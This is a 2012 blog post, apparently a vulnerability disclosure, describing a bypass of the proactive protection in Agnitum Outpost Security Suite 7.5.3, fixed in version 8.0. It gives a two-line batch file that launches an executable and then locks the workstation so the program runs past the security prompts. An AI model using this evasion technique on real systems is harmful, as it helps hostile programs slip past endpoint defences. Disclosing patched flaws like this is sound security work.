воскресенье, 23 декабря 2012 г.

Bypass proactive protection in Agnitum Outpost Security Suite. Full video demonstration.

 I have previously reported without technical details

Here is a video demonstration with technical details.


 Vulnerable: Agnitum Outpost Security Suite v 7.5.3 (3942.608.1810); other versions may also be affected.
Fixed in version 8.0 (4164.652.1856)

This video demonstration was first shown on zeroday show (ZeroNights conference 2012).


We can use Windows Lock to bypass proactive protection.


If you want to automate use bat-file below

start 1.exe
ping 127.0.0.1 -n 10 -w 10000 > NULL & rundll32.exe user32.dll,LockWorkStation


Original post in Russian

Комментариев нет:

Отправить комментарий